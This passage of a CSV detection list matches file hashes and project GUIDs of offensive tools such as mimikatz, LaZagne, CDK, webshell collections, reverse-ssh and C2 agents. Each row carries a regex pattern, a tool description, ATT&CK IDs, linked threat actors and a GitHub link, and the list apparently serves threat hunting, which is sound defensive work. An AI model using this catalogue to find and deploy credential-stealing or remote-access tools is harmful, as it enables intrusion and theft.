fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27125" "*588d6bd5d9883e877c138c05ad6c30d4615b2eee7a7dd1d64c5f209ff27cf3b5*",".{0,1000}588d6bd5d9883e877c138c05ad6c30d4615b2eee7a7dd1d64c5f209ff27cf3b5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27126" "*588f790b5ea620a3077e6231bef7180951410f445c5d5b9aac8289b3a8d3cf1a*",".{0,1000}588f790b5ea620a3077e6231bef7180951410f445c5d5b9aac8289b3a8d3cf1a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27127" "*58933165962df4ae3312226433df5adb5e646bfce9d0370327b7856faaa4b241*",".{0,1000}58933165962df4ae3312226433df5adb5e646bfce9d0370327b7856faaa4b241.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. 
digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27129" "*58975a07474741bbe65b5cb0acccc8a20896027e1365d5543a2a9217d55ef879*",".{0,1000}58975a07474741bbe65b5cb0acccc8a20896027e1365d5543a2a9217d55ef879.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27131" "*58993d929685b240f375125ce5ad0540f57f6eed29b6feebaff194c061119052*",".{0,1000}58993d929685b240f375125ce5ad0540f57f6eed29b6feebaff194c061119052.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","27132" "*58ad0843f7f9e999e35a9f41aff3c5f67e63194ad08359b323923c2be9674d52*",".{0,1000}58ad0843f7f9e999e35a9f41aff3c5f67e63194ad08359b323923c2be9674d52.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27135" 
"*58add3b1ecdd2a00d7f5f40fe04e46dff4beff64fa127f6a6b045d6788d58c1dd19675241841b5b15e4095ce39a01387609572d83acc5def7a04564ece79987a7b19cf1ecca6c5d672b91d94239079a30e7130a099fc7d9c8fc94d07*",".{0,1000}58add3b1ecdd2a00d7f5f40fe04e46dff4beff64fa127f6a6b045d6788d58c1dd19675241841b5b15e4095ce39a01387609572d83acc5def7a04564ece79987a7b19cf1ecca6c5d672b91d94239079a30e7130a099fc7d9c8fc94d07.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#certificate","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","27136" "*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#filehash","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","27137" "*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27138" 
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27139" "*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27140" "*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27141" 
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27142" "*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27143" "*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27144" 
"*58b002643e9749100cc28705f590acc31b8e1ea19f542aead17c109f1f938f32*",".{0,1000}58b002643e9749100cc28705f590acc31b8e1ea19f542aead17c109f1f938f32.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","27145" "*58B32FCA-F385-4500-9A8E-7CBA1FC9BA13*",".{0,1000}58B32FCA\-F385\-4500\-9A8E\-7CBA1FC9BA13.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#GUIDproject","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","27146" "*58b90ade2d52bd1436e28c1930315aa46eedd5df7ff89f4ef66554933b2792b8*",".{0,1000}58b90ade2d52bd1436e28c1930315aa46eedd5df7ff89f4ef66554933b2792b8.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","27147" "*58ba7d7a43c3cbf5ffba7351a6509d04290b41ac5565735c6b6b66ffaf2daaca*",".{0,1000}58ba7d7a43c3cbf5ffba7351a6509d04290b41ac5565735c6b6b66ffaf2daaca.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#filehash","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","27148" 
"*58c2cf7ff89c1fc1871e507f0c1a467dcf37b45d094d73c61b0ded0f935eec98*",".{0,1000}58c2cf7ff89c1fc1871e507f0c1a467dcf37b45d094d73c61b0ded0f935eec98.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","27149" "*58c42e01802aa60be17c26ee13705be9d17a7578a7aad62b19758b2f96c5d455*",".{0,1000}58c42e01802aa60be17c26ee13705be9d17a7578a7aad62b19758b2f96c5d455.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27150" "*58c4d3ad2f3ffb337d715f4233e5e15a97ba83e51be154956e4e173f31aa3de5*",".{0,1000}58c4d3ad2f3ffb337d715f4233e5e15a97ba83e51be154956e4e173f31aa3de5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27151" "*58cd6577c12f1c12a51e8abbe80aa54cd358e7c65a4efa8f28425d98ff0278cc*",".{0,1000}58cd6577c12f1c12a51e8abbe80aa54cd358e7c65a4efa8f28425d98ff0278cc.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","27152" "*58d80168520f8d397087fea5495f9955f7a1399131f5b963d168950ec2f2a446*",".{0,1000}58d80168520f8d397087fea5495f9955f7a1399131f5b963d168950ec2f2a446.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","27154" "*58d82bca11a41a01d0ddfa7d105e6a48*",".{0,1000}58d82bca11a41a01d0ddfa7d105e6a48.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","27156" "*58d9516f4e361b773e8638c802e7d0bcc716d1c750d7306764062394fc129983*",".{0,1000}58d9516f4e361b773e8638c802e7d0bcc716d1c750d7306764062394fc129983.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27157" "*58de3ab6935d1248e937e333e917586efb058e8b7d65ade38989543c806bd23e*",".{0,1000}58de3ab6935d1248e937e333e917586efb058e8b7d65ade38989543c806bd23e.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27158" "*58de3ab6935d1248e937e333e917586efb058e8b7d65ade38989543c806bd23e*",".{0,1000}58de3ab6935d1248e937e333e917586efb058e8b7d65ade38989543c806bd23e.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 
- TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#filehash","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","27159" "*58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d*",".{0,1000}58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27160" "*58f9c5248fa5a9cc64622cc12e3963690eed691cd16cbdf5506d5328cfb41f69*",".{0,1000}58f9c5248fa5a9cc64622cc12e3963690eed691cd16cbdf5506d5328cfb41f69.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","27163" "*58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15*",".{0,1000}58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27164" "*58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15*",".{0,1000}58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15.{0,1000}","offensive_tool_keyword","Termite","Termite 
rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27165" "*5900fc96f25ad0d41cbed1bb7b0f38bde26e0ebebc290f1a294ffedeb1d68b83*",".{0,1000}5900fc96f25ad0d41cbed1bb7b0f38bde26e0ebebc290f1a294ffedeb1d68b83.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","27166" "*5905bf979bb3d714c2641502161d807723fc79cfc9b58cbe2a95882f12623778*",".{0,1000}5905bf979bb3d714c2641502161d807723fc79cfc9b58cbe2a95882f12623778.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","27168" "*590cdf2dfb21bf5ee5fcdfe1f37bd530cbd946cfcc43f8e644638486b06cdc18*",".{0,1000}590cdf2dfb21bf5ee5fcdfe1f37bd530cbd946cfcc43f8e644638486b06cdc18.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","27169" 
"*590e6b85b7ae5a1572103332c6cc9494a13c65d33e839b3316704fe79c998f65*",".{0,1000}590e6b85b7ae5a1572103332c6cc9494a13c65d33e839b3316704fe79c998f65.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27171" "*591034aa486803adc5b5d4df97d915db89616810ceac4569761e30190f8615ac*",".{0,1000}591034aa486803adc5b5d4df97d915db89616810ceac4569761e30190f8615ac.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27172" "*59156b50c20d44f8757a3a53ebaf4f515b8eb86802ee51085ace7b1f714406ce*",".{0,1000}59156b50c20d44f8757a3a53ebaf4f515b8eb86802ee51085ace7b1f714406ce.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27173" 
"*591c23bad87621b0cf6f2e5f27f038205e11a9241f83ab28bbafed575d8fd6b6*",".{0,1000}591c23bad87621b0cf6f2e5f27f038205e11a9241f83ab28bbafed575d8fd6b6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27174" "*59224C16-39C5-49EA-8525-F493DC1D66FE*",".{0,1000}59224C16\-39C5\-49EA\-8525\-F493DC1D66FE.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27175" "*592357cfeb7bbc10865d9e64e4b778bd742a6abb452166e9f9b1eef404f67a31*",".{0,1000}592357cfeb7bbc10865d9e64e4b778bd742a6abb452166e9f9b1eef404f67a31.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 
- APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27176" "*592357cfeb7bbc10865d9e64e4b778bd742a6abb452166e9f9b1eef404f67a31*",".{0,1000}592357cfeb7bbc10865d9e64e4b778bd742a6abb452166e9f9b1eef404f67a31.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
